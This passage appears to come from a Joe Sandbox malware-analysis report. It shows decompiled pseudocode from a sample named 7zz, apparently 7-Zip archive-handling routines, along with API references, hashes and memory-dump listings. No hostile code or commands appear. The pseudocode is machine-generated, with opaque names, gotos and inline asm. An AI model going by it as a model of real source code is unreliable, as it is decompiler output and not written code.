											_t244 = _t244 - 1;
											__eflags = _t244;
										} while (_t244 != 0);
									}
									_t313 = _t205[2];
									_t301 = _t205[1] + _t278;
									_t245 = 0;
									__eflags = _t313;
									if(_t313 > 0) {
										_t281 =  *((intOrPtr*)(_t317 + 0x64)) + 4;
										__eflags = _t281;
										do {
											_t245 = _t245 +  *_t281;
											_t281 = _t281 + 8;
											_t313 = _t313 - 1;
											__eflags = _t313;
										} while (_t313 != 0);
									}
									E0042389F(_t317 + 0x6c, _t301, _t205[3] + _t245);
									 *(_t319 - 0x10) =  *(_t319 - 0x10) + 1;
									 *(_t319 - 0x1c) =  *(_t319 - 0x1c) + 0x10;
									__eflags =  *(_t319 - 0x10) -  *(_t317 + 0x38);
								} while ( *(_t319 - 0x10) <  *(_t317 + 0x38));
							}
							_t312 = 0;
							__eflags =  *(_t319 - 0x14);
							if( *(_t319 - 0x14) > 0) {
								do {
									_t276 =  *(_t317 + 0x74);
									_t299 = 0;
									__eflags = _t276;
									if(_t276 <= 0) {
										L31:
										_t299 = _t299 | 0xffffffff;
										__eflags = _t299;
									} else {
										_t202 =  *((intOrPtr*)(_t317 + 0x78)) + 4;
										__eflags = _t202;
										while(1) {
											__eflags =  *_t202 - _t312;
											if( *_t202 == _t312) {
												goto L32;
											}
											_t299 = _t299 + 1;
											_t202 = _t202 + 8;
											__eflags = _t299 - _t276;
											if(_t299 < _t276) {
												continue;
											} else {
												goto L31;
											}
											goto L32;
										}
									}
									L32:
									__eflags = _t299 - 0xffffffff;
									if(_t299 == 0xffffffff) {
										E00415C6D(_t317 + 0x94, _t312);
									}
									_t312 = _t312 + 1;
									__eflags = _t312 -  *(_t319 - 0x14);
								} while (_t312 <  *(_t319 - 0x14));
							}
						}
						_t307 = 0;
						__eflags =  *(_t319 - 0x18);
						if( *(_t319 - 0x18) > 0) {
							do {
								_t274 =  *(_t317 + 0x74);
								_t298 = 0;
								__eflags = _t274;
								if(_t274 <= 0) {
									L40:
									_t298 = _t298 | 0xffffffff;
									__eflags = _t298;
								} else {
									_t199 =  *((intOrPtr*)(_t317 + 0x78));
									while(1) {
										__eflags =  *_t199 - _t307;
										if( *_t199 == _t307) {
											goto L41;
										}
										_t298 = _t298 + 1;
										_t199 = _t199 + 8;
										__eflags = _t298 - _t274;
										if(_t298 < _t274) {
											continue;
										} else {
											goto L40;
										}
										goto L41;
									}
								}
								L41:
								__eflags = _t298 - 0xffffffff;
								if(_t298 == 0xffffffff) {
									E00415C6D(_t317 + 0x80, _t307);
								}
								_t307 = _t307 + 1;
								__eflags = _t307 -  *(_t319 - 0x18);
							} while (_t307 <  *(_t319 - 0x18));
						}
						__eflags =  *(_t317 + 0x88);
						if( *(_t317 + 0x88) == 0) {
							 *(_t319 - 0x1c) = 1;
							E0046B8F4(_t319 - 0x1c, 0x47e128);
						}
						_t162 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x8c))));
						while(1) {
							_t163 = E00424159(_t317 + 0x58, _t162, _t319 - 0x1c, _t319 - 0x10);
							_t254 =  *(_t319 - 0x1c);
							_t308 = 0;
							__eflags = _t254;
							if(_t254 <= 0) {
								goto L50;
							}
							_t196 =  *((intOrPtr*)(_t317 + 0x64)) + 4;
							__eflags = _t196;
							do {
								_t308 = _t308 +  *_t196;
								_t196 = _t196 + 8;
								_t254 = _t254 - 1;
								__eflags = _t254;
							} while (_t254 != 0);
							L50:
							_t255 =  *(_t317 + 0x74);
							_t296 = 0;
							__eflags = _t255;
							if(_t255 <= 0) {
								L54:
								_t164 = _t163 | 0xffffffff;
								__eflags = _t164;
							} else {
								_t194 =  *((intOrPtr*)(_t317 + 0x78)) + 4;
								__eflags = _t194;
								while(1) {
									__eflags =  *_t194 - _t308;
									if( *_t194 == _t308) {
										break;
									}
									_t296 = _t296 + 1;
									_t194 = _t194 + 8;
									__eflags = _t296 - _t255;
									if(_t296 < _t255) {
										continue;
									} else {
										goto L54;
									}
									goto L55;
								}
								_t164 = _t296;
							}
							L55:
							__eflags = _t164;
							if(_t164 >= 0) {
								_t162 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x78)) + _t164 * 8));
								continue;
							}
							_t256 =  *(_t317 + 0x9c);
							_t297 = 0;
							__eflags = _t256;
							if(_t256 > 0) {
								_t188 =  *((intOrPtr*)(_t317 + 0xa0));
								while(1) {
									__eflags =  *_t188 - _t308;
									if(__eflags == 0) {
										break;
									}
									_t297 = _t297 + 1;
									_t188 = _t188 + 4;
									__eflags = _t297 - _t256;
									if(_t297 < _t256) {
										continue;
									} else {
									}
									goto L64;
								}
								_t243 = _t317 + 0x94;
								 *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x94)) + 4))(_t297, 1);
								E00408767(_t243, __eflags, 0);
								 *((intOrPtr*)( *((intOrPtr*)(_t243 + 0xc)))) = _t308;
							}
							L64:
							__eflags =  *((char*)(_t317 + 0x48));
							if( *((char*)(_t317 + 0x48)) != 0) {
								_t310 =  *(_t317 + 0x9c);
								_t241 = 0;
								__eflags = _t310;
								 *(_t319 - 0x1c) = _t310;
								if(_t310 > 0) {
									do {
										E0042389F(_t317 + 0x6c,  *(_t319 - 0x18) + _t241,  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0xa0)) + _t241 * 4)));
										_t241 = _t241 + 1;
										__eflags = _t241 - _t310;
									} while (_t241 < _t310);
								}
								E0040862D();
								_t242 = 0;
								__eflags = _t310;
								if(_t310 > 0) {
									 *(_t319 - 0x18) = _t319 - 0x44;
									do {
										E00404AD0(_t319 - 0x44, 4);
										 *(_t319 - 0x44) = 0x47b178;
										 *(_t319 - 0x48) =  *(_t319 - 0x48) & 0x00000000;
										_t175 = 1;
										 *((intOrPtr*)(_t319 - 0x2c)) = _t175;
										 *((intOrPtr*)(_t319 - 0x28)) = _t175;
										 *(_t319 - 4) = 2;
										_push(_t319 - 0x4c);
										 *((intOrPtr*)(_t319 - 0x4c)) = 0x6f10701;
										E00428BB4(_t317 + 0x1c);
										_t178 = 1;
										E0042389F(_t317 + 0x58, _t178, _t178);
										E00415C6D(_t317 + 0x94,  *(_t319 - 0x14) + _t242);
										 *(_t319 - 0x44) = 0x47b178;
										 *(_t319 - 4) = 3;
										E0040862D();
										 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
										E00408604(_t319 - 0x44);
										_t242 = _t242 + 1;
										__eflags = _t242 -  *(_t319 - 0x1c);
									} while (_t242 <  *(_t319 - 0x1c));
								}
							}
							goto L70;
						}
					} else {
						if( *((char*)(__ecx + 0x48)) == 0) {
							 *(_t319 - 0x1c) = 1;
							E0046B8F4(_t319 - 0x1c, 0x47e128);
						}
						if( *(_t317 + 0x38) != _t305) {
							 *(_t319 - 0x1c) = 1;
							E0046B8F4(_t319 - 0x1c, 0x47e128);
						}
						E00428B61(_t319 - 0x6c);
						_t247 = 1;
						_push(_t319 - 0x74);
						 *(_t319 - 4) = _t305;
						 *(_t319 - 0x54) = _t247;
						 *(_t319 - 0x50) = _t247;
						 *((intOrPtr*)(_t319 - 0x74)) = 0x6f10701;
						 *(_t319 - 0x70) = _t305;
						E00428BB4(_t317 + 0x1c);
						_t225 = _t247;
						_push(_t225);
						_t226 = _t247;
						_push(_t226);
						E0042389F(_t317 + 0x58);
						E00415C6D(_t317 + 0x80, _t305);
						E00415C6D(_t317 + 0x94, _t305);
						 *(_t319 - 0x6c) = 0x47b178;
						 *(_t319 - 0x1c) = _t319 - 0x6c;
						 *(_t319 - 4) = _t247;
						E0040862D();
						 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
						E00408604(_t319 - 0x6c);
					}
					L70:
					_t240 =  *(_t317 + 0x24) - 1;
					if(_t240 >= 0) {
						_t309 = _t317 + 0xfc;
						do {
							E0042389F(_t309,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t240 * 4)))),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t240 * 4)) + 4)));
							_t240 = _t240 - 1;
						} while (_t240 >= 0);
					}
					_push(0xa8);
					_t258 = E004079F2();
					 *(_t319 - 0x1c) = _t258;
					_t330 = _t258;
					 *(_t319 - 4) = 4;
					if(_t258 == 0) {
						_t166 = 0;
						__eflags = 0;
					} else {
						_push(_t317 + 0x58);
						_t166 = E004233F8(_t258, _t330);
					}
					 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t317 + 0xf8)) = _t166;
					E00423685(_t166, _t317 + 0xa8);
					 *((char*)(_t317 + 0x110)) = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t319 - 0xc));
				return 0;
			}

0x004285b2
0x004285bc
0x004285bf
0x004285c8
0x004285ce
0x004285d3
0x00428687
0x00428689
0x0042868c
0x0042868f
0x00428692
0x00428698
0x0042869b
0x0042869e
0x004286a2
0x004286a5
0x004286a8
0x004286ab
0x004286ae
0x004286b1
0x004286b3
0x004286c8
0x004286d2
0x004286dd
0x004286e0
0x004286b5
0x004286c1
0x004286c1
0x004286e4
0x004286e5
0x004286e7
0x004286ea
0x004286ec
0x004286fb
0x00428700
0x00428703
0x00428703
0x004286ec
0x004286ea
0x00428708
0x0042870b
0x00428713
0x00428718
0x0042871b
0x0042871e
0x0042871e
0x00428727
0x00428727
0x00428727
0x00428729
0x0042872c
0x0042872e
0x00428734
0x00428738
0x0042873a
0x0042873c
0x0042873c
0x0042873c
0x00428740
0x00428743
0x00428745
0x00428748
0x0042874a
0x0042874c
0x0042874e
0x00428751
0x00428751
0x00428753
0x00428756
0x00428756
0x00428756
0x00428751
0x0042875c
0x0042875f
0x00428761
0x00428763
0x00428765
0x0042876a
0x0042876a
0x0042876d
0x0042876d
0x0042876f
0x00428772
0x00428772
0x00428772
0x0042876d
0x0042877f
0x00428784
0x0042878a
0x0042878e
0x0042878e
0x00428740
0x00428793
0x00428795
0x00428798
0x0042879a
0x0042879a
0x0042879d
0x0042879f
0x004287a1
0x004287b5
0x004287b5
0x004287b5
0x004287a3
0x004287a6
0x004287a6
0x004287a9
0x004287a9
0x004287ab
0x00000000
0x00000000
0x004287ad
0x004287ae
0x004287b1
0x004287b3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004287b3
0x004287a9
0x004287b8
0x004287b8
0x004287bb
0x004287c4
0x004287c4
0x004287c9
0x004287ca
0x004287ca
0x0042879a
0x00428798
0x004287cf
0x004287d1
0x004287d4
0x004287d6
0x004287d6
0x004287d9
0x004287db
0x004287dd
0x004287ee
0x004287ee
0x004287ee
0x004287df
0x004287df
0x004287e2
0x004287e2
0x004287e4
0x00000000
0x00000000
0x004287e6
0x004287e7
0x004287ea
0x004287ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004287ec
0x004287e2
0x004287f1
0x004287f1
0x004287f4
0x004287fd
0x004287fd
0x00428802
0x00428803
0x00428803
0x004287d6
0x00428808
0x0042880f
0x0042881a
0x00428821
0x00428821
0x0042882c
0x0042882e
0x0042883a
0x0042883f
0x00428842
0x00428844
0x00428846
0x00000000
0x00000000
0x0042884b
0x0042884b
0x0042884e
0x0042884e
0x00428850
0x00428853
0x00428853
0x00428853
0x00428856
0x00428856
0x00428859
0x0042885b
0x0042885d
0x00428871
0x00428871
0x00428871
0x0042885f
0x00428862
0x00428862
0x00428865
0x00428865
0x00428867
0x00000000
0x00000000
0x00428869
0x0042886a
0x0042886d
0x0042886f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042886f
0x00428880
0x00428880
0x00428874
0x00428874
0x00428876
0x0042887b
0x00000000
0x0042887b
0x00428884
0x0042888a
0x0042888c
0x0042888e
0x00428890
0x00428896
0x00428896
0x00428898
0x00000000
0x00000000
0x0042889a
0x0042889b
0x0042889e
0x004288a0
0x00000000
0x00000000
0x004288a2
0x00000000
0x004288a0
0x004288aa
0x004288b5
0x004288bc
0x004288c4
0x004288c4
0x004288c6
0x004288c6
0x004288ca
0x004288d0
0x004288d6
0x004288d8
0x004288da
0x004288dd
0x004288df
0x004288f1
0x004288f6
0x004288f7
0x004288f7
0x004288df
0x00428901
0x00428906
0x00428908
0x0042890a
0x00428918
0x0042891b
0x00428920
0x00428925
0x0042892a
0x0042892e
0x00428932
0x00428935
0x0042893b
0x00428942
0x00428943
0x0042894a
0x00428954
0x00428957
0x00428968
0x0042896d
0x00428973
0x0042897a
0x0042897f
0x00428986
0x0042898b
0x0042898c
0x0042898c
0x0042891b
0x0042890a
0x00000000
0x004288ca
0x004285d9
0x004285dd
0x004285e8
0x004285ef
0x004285ef
0x004285f7
0x00428602
0x00428609
0x00428609
0x00428611
0x0042861b
0x0042861f
0x00428620
0x00428623
0x00428626
0x00428629
0x00428630
0x00428633
0x0042863c
0x0042863d
0x0042863f
0x00428640
0x00428641
0x0042864d
0x00428659
0x00428661
0x00428668
0x0042866e
0x00428671
0x00428676
0x0042867d
0x0042867d
0x00428991
0x00428994
0x00428997
0x00428999
0x0042899f
0x004289ac
0x004289b1
0x004289b1
0x0042899f
0x004289b4
0x004289bf
0x004289c1
0x004289c4
0x004289c6
0x004289cd
0x004289da
0x004289da
0x004289cf
0x004289d2
0x004289d3
0x004289d3
0x004289dc
0x004289e9
0x004289ef
0x004289f4
0x004289f4
0x00428a03
0x00428a0b

APIs

__EH_prolog.LIBCMT ref: 004285B2

Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922

Strings

-B, xrefs: 00428661, 00428913

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ExceptionH_prologRaise
String ID: -B
API String ID: 3968804221-1556737743
Opcode ID: 8b6edb9bbaf86e6928269366864835dc3159b99dbc82969dba9d0f39c986a797
Instruction ID: 497342fa4ed3f4b9ebe93b95b60b4c65b54af6a842b733f80198680210375e09
Opcode Fuzzy Hash: 8b6edb9bbaf86e6928269366864835dc3159b99dbc82969dba9d0f39c986a797
Instruction Fuzzy Hash: FCE1F271A007158FDB24DFAAD981BAFB3F5FF84304FA0451EE056A7281DB38A941CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040C756 Relevance: 3.0, APIs: 2, Instructions: 15
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C756(struct _FILETIME* __ecx) {
				struct _SYSTEMTIME _v20;
				struct _FILETIME* _t7;

				_t7 = __ecx;
				GetSystemTime( &_v20);
				return SystemTimeToFileTime( &_v20, _t7);
			}

0x0040c760
0x0040c763
0x0040c776

APIs

GetSystemTime.KERNEL32(?,?,?,00000000,00000000,00490AB0), ref: 0040C763
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040C76E

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: Time$System$File
String ID:
API String ID: 2838179519-0
Opcode ID: f99081a57e20e77144345343434b143621f6c0873b93853711f5c94f6b142cd8
Instruction ID: 3ee87ebca316f74d42706c1ab11f39572f018b02ddf3dd2ab21967cb3d1fbd11
Opcode Fuzzy Hash: f99081a57e20e77144345343434b143621f6c0873b93853711f5c94f6b142cd8
Instruction Fuzzy Hash: 95D0C972810129AB9B00ABA89C0D8EF7BACEA49114B840866A555D3041E6B0E51487E5

Uniqueness

Uniqueness Score: -1.00%

Function 00434D28 Relevance: 2.5, APIs: 1, Instructions: 999
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E00434D28() {
				signed int _t538;
				signed int _t539;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t548;
				signed int _t560;
				signed char _t562;
				signed int _t563;
				signed int _t565;
				signed int _t569;
				signed int _t570;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t589;
				signed int _t598;
				signed int _t602;
				signed int _t627;
				signed int _t631;
				signed int _t636;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t655;
				signed int _t657;
				signed int _t661;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				signed int _t667;
				signed int _t674;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed char _t691;
				signed char _t692;
				intOrPtr* _t694;
				signed int _t696;
				signed int _t698;
				signed int _t701;
				signed int _t703;
				signed int _t706;
				signed int _t712;
				signed int _t717;
				void* _t723;
				signed int _t727;
				signed int _t734;
				signed int _t742;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t768;
				intOrPtr* _t775;
				intOrPtr _t776;
				signed int _t777;
				void* _t779;
				signed int _t781;
				signed int _t783;
				signed int _t787;
				signed int* _t801;
				signed int _t807;
				intOrPtr _t833;
				signed int _t836;
				signed int _t840;
				signed int _t872;
				signed int _t876;
				signed int _t880;
				signed char _t890;
				intOrPtr _t909;
				signed int _t925;
				signed int _t926;
				signed int _t935;
				intOrPtr _t938;
				signed int _t939;
				intOrPtr* _t940;
				intOrPtr* _t941;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t949;
				intOrPtr _t950;
				intOrPtr* _t952;
				intOrPtr _t954;
				intOrPtr _t956;
				intOrPtr _t958;
				void* _t959;
				void* _t961;

				E0046B890(E00477DA9, _t959);
				_t935 = 0;
				 *((intOrPtr*)(_t959 - 0x10)) = _t961 - 0x98;
				 *(_t959 - 4) = 0;
				 *((char*)(_t959 - 0x21)) =  *((intOrPtr*)(_t959 + 0x10)) == 0xffffffff;
				if( *((char*)(_t959 - 0x21)) != 0) {
					 *((intOrPtr*)(_t959 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t959 + 8)) + 0x24));
				}
				if( *((intOrPtr*)(_t959 + 0x10)) == _t935) {
					L205:
					_t538 = 0;
					goto L41;
				} else {
					 *(_t959 - 0x3c) = _t935;
					 *(_t959 - 0x38) = _t935;
					 *(_t959 + 0x14) = 0xfffffffe;
					 *(_t959 - 0x90) =  *(_t959 + 0x14) != _t935;
					_t539 = 0;
					while(1) {
						 *(_t959 - 0x44) = _t539;
						if(_t539 >=  *((intOrPtr*)(_t959 + 0x10))) {
							break;
						}
						if( *((char*)(_t959 - 0x21)) == 0) {
							_t539 =  *( *((intOrPtr*)(_t959 + 0xc)) + _t539 * 4);
						}
						_t909 =  *((intOrPtr*)(_t959 + 8));
						_t765 =  *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8;
						_t958 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t909 + 0x14)) +  *( *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8) * 4)) + 0x70)) + ( *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8)[1] * 4));
						if(( *(_t958 + 0x1c) >> 0x00000004 & 0x00000001) == 0) {
							_t768 = E00434147( *((intOrPtr*)(_t959 + 8)) + 8, _t765);
							if(_t768 !=  *(_t959 + 0x14)) {
								 *(_t959 - 0x3c) =  *(_t959 - 0x3c) + _t935;
								asm("adc [ebp-0x38], ebx");
							}
							 *(_t959 + 0x14) = _t768;
							_t935 =  *((intOrPtr*)(_t958 + 0x10)) +  *((intOrPtr*)(_t958 + 0xc));
							asm("adc ebx, ecx");
						}
						_t539 =  *(_t959 - 0x44) + 1;
					}
					 *(_t959 - 0x3c) =  *(_t959 - 0x3c) + _t935;
					asm("adc [ebp-0x38], ebx");
					_t775 =  *((intOrPtr*)(_t959 + 0x18));
					 *((intOrPtr*)( *_t775 + 0xc))(_t775,  *(_t959 - 0x3c),  *(_t959 - 0x38));
					_push(0x38);
					 *(_t959 - 0x3c) = 0;
					 *(_t959 - 0x38) = 0;
					 *((intOrPtr*)(_t959 - 0x8c)) = 0;
					 *((intOrPtr*)(_t959 - 0x88)) = 0;
					_t787 = E004079F2();
					 *(_t959 + 0x14) = _t787;
					__eflags = _t787;
					 *(_t959 - 4) = 1;
					if(_t787 == 0) {
						_t945 = 0;
						__eflags = 0;
					} else {
						_t945 = E0040F3E5(_t787);
					}
					 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
					__eflags = _t945;
					 *(_t959 - 0x98) = _t945;
					 *(_t959 - 0x2c) = _t945;
					if(_t945 != 0) {
						 *((intOrPtr*)( *_t945 + 4))(_t945);
					}
					_push(0);
					 *(_t959 - 4) = 2;
					E0040F478(_t945, _t775);
					_push(0x18);
					_t544 = E004079F2();
					__eflags = _t544;
					if(_t544 == 0) {
						_t544 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t544 + 4)) = 0x47b080;
						 *((intOrPtr*)(_t544 + 8)) = 0;
						 *((intOrPtr*)(_t544 + 0x10)) = 0;
						 *((intOrPtr*)(_t544 + 0xc)) = 0;
						 *((intOrPtr*)(_t544 + 0x14)) = 0;
						 *_t544 = 0x47b070;
						 *((intOrPtr*)(_t544 + 4)) = 0x47b060;
					}
					__eflags = _t544;
					 *(_t959 - 0x28) = _t544;
					if(_t544 != 0) {
						 *((intOrPtr*)( *_t544 + 4))(_t544);
					}
					 *(_t959 - 0x94) = 0;
					 *(_t959 - 0x20) = 0;
					 *(_t959 - 0x58) = 0;
					 *(_t959 - 0x1c) = 0;
					 *(_t959 - 0x5c) = 0;
					 *(_t959 - 0x18) = 0;
					_push(0x24);
					 *(_t959 - 4) = 6;
					_t545 = E004079F2();
					 *(_t959 + 0x14) = _t545;
					__eflags = _t545;
					 *(_t959 - 4) = 7;
					if(_t545 == 0) {
						_t946 = 0;
						__eflags = 0;
					} else {
						_t946 = E00435A6A(_t545);
					}
					__eflags = _t946;
					 *(_t959 - 0x50) = _t946;
					 *(_t959 - 4) = 6;
					 *(_t959 - 0x14) = _t946;
					if(_t946 != 0) {
						 *((intOrPtr*)( *_t946 + 4))(_t946);
					}
					 *(_t959 - 4) = 8;
					_t546 = E004339CC(_t946);
					__eflags = _t546;
					if(_t546 != 0) {
						E00404AD0(_t959 - 0x84, 1);
						 *((intOrPtr*)(_t959 - 0x84)) = 0x47ab08;
						 *(_t959 - 4) = 9;
						 *(_t959 - 0x44) = 0;
						while(1) {
							L43:
							_t548 =  *(_t959 - 0x44);
							__eflags = _t548 -  *((intOrPtr*)(_t959 + 0x10));
							if(_t548 >=  *((intOrPtr*)(_t959 + 0x10))) {
								break;
							}
							__eflags =  *((char*)(_t959 - 0x21));
							if( *((char*)(_t959 - 0x21)) == 0) {
								_t947 =  *( *((intOrPtr*)(_t959 + 0xc)) +  *(_t959 - 0x44) * 4);
							} else {
								_t947 = _t548;
							}
							_t938 =  *((intOrPtr*)(_t959 + 8));
							 *(_t959 - 0x44) =  *(_t959 - 0x44) + 1;
							_t801 =  *((intOrPtr*)(_t938 + 0x28)) + _t947 * 8;
							 *(_t959 - 0xa0) = _t801;
							_t776 =  *((intOrPtr*)( *((intOrPtr*)(_t938 + 0x14)) +  *_t801 * 4));
							_t560 =  *( *((intOrPtr*)(_t776 + 0x70)) + _t801[1] * 4);
							 *(_t959 - 0x48) = _t560;
							_t562 =  *(_t560 + 0x1c) >> 4;
							__eflags = _t562 & 0x00000001;
							if((_t562 & 0x00000001) == 0) {
								_t563 = E00434147(_t938 + 8, _t801);
								__eflags = _t563;
								 *(_t959 - 0x54) = _t563;
								if(_t563 >= 0) {
									_t565 =  *( *((intOrPtr*)(_t938 + 0x50)) +  *(_t959 - 0x54) * 4);
									 *(_t959 - 0x60) = _t565;
									 *(_t959 + 0x14) = _t565;
									E0040862D();
									while(1) {
										__eflags =  *(_t959 + 0x14) - _t947;
										if( *(_t959 + 0x14) >= _t947) {
											break;
										}
										E0043AC2F(_t959 - 0x84, 0);
										 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
									}
									E0043AC2F(_t959 - 0x84, 1);
									 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
									_t569 =  *((intOrPtr*)( *(_t959 - 0x48) + 0x10)) +  *((intOrPtr*)( *(_t959 - 0x48) + 0xc));
									__eflags = _t569;
									asm("adc ecx, esi");
									 *(_t959 - 0x68) = _t569;
									 *((intOrPtr*)(_t959 - 0x64)) = 0;
									while(1) {
										_t570 =  *(_t959 - 0x44);
										__eflags = _t570 -  *((intOrPtr*)(_t959 + 0x10));
										if(_t570 >=  *((intOrPtr*)(_t959 + 0x10))) {
											break;
										}
										__eflags =  *((char*)(_t959 - 0x21));
										if( *((char*)(_t959 - 0x21)) == 0) {
											_t570 =  *( *((intOrPtr*)(_t959 + 0xc)) + _t570 * 4);
										}
										 *(_t959 - 0x4c) = _t570;
										_t722 =  *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8;
										_t956 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t938 + 0x14)) +  *( *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8) * 4)) + 0x70)) + ( *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8)[1] * 4));
										_t890 =  *(_t956 + 0x1c) >> 4;
										__eflags = _t890 & 0x00000001;
										if((_t890 & 0x00000001) != 0) {
											L90:
											 *(_t959 - 0x44) =  *(_t959 - 0x44) + 1;
											continue;
										} else {
											_t723 = E00434147(_t938 + 8, _t722);
											__eflags = _t723 -  *(_t959 - 0x54);
											if(_t723 !=  *(_t959 - 0x54)) {
												break;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags =  *(_t959 + 0x14) -  *(_t959 - 0x4c);
												if( *(_t959 + 0x14) >=  *(_t959 - 0x4c)) {
													break;
												}
												E0043AC2F(_t959 - 0x84, 0);
												 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
											}
											E0043AC2F(_t959 - 0x84, 1);
											 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
											_t727 =  *((intOrPtr*)(_t956 + 0x10)) +  *((intOrPtr*)(_t956 + 0xc));
											__eflags = _t727;
											asm("adc ecx, esi");
											 *(_t959 - 0x68) = _t727;
											 *((intOrPtr*)(_t959 - 0x64)) = 0;
											goto L90;
										}
									}
									_t807 =  *(_t959 - 0x98);
									 *(_t807 + 0x28) =  *(_t959 - 0x3c);
									 *(_t807 + 0x2c) =  *(_t959 - 0x38);
									 *((intOrPtr*)(_t807 + 0x20)) =  *((intOrPtr*)(_t959 - 0x8c));
									 *((intOrPtr*)(_t807 + 0x24)) =  *((intOrPtr*)(_t959 - 0x88));
									_t949 = E0040F554(_t807);
									__eflags = _t949;
									if(_t949 != 0) {
										goto L52;
									}
									_push(0x50);
									_t589 = E004079F2();
									__eflags = _t589;
									if(_t589 == 0) {
										_t939 = 0;
										__eflags = 0;
									} else {
										_t939 = _t589;
										 *((intOrPtr*)(_t589 + 4)) = 0;
										 *((intOrPtr*)(_t589 + 0x10)) = 0;
										 *((intOrPtr*)(_t589 + 0x2c)) = 0;
										 *((intOrPtr*)(_t589 + 0x34)) = 0;
										 *_t589 = 0x47b460;
									}
									__eflags = _t939;
									 *(_t959 - 0x34) = _t939;
									if(_t939 != 0) {
										 *((intOrPtr*)( *_t939 + 4))(_t939);
									}
									 *(_t959 - 4) = 0xc;
									_t950 =  *((intOrPtr*)( *((intOrPtr*)(_t776 + 0x5c)) + E00434120( *(_t959 - 0x48),  *((intOrPtr*)(_t776 + 0x58))) * 4));
									E00434705(_t939,  *((intOrPtr*)(_t959 + 8)) + 8, _t959 - 0x84,  *(_t959 - 0x60),  *(_t959 - 0x68),  *((intOrPtr*)(_t959 - 0x64)),  *((intOrPtr*)(_t959 + 0x18)),  *(_t959 - 0x90));
									 *( *(_t959 - 0x50) + 0x21) =  *( *(_t959 - 0x50) + 0x21) & 0x00000000;
									_t598 =  *(_t950 + 6) & 0x0000000f;
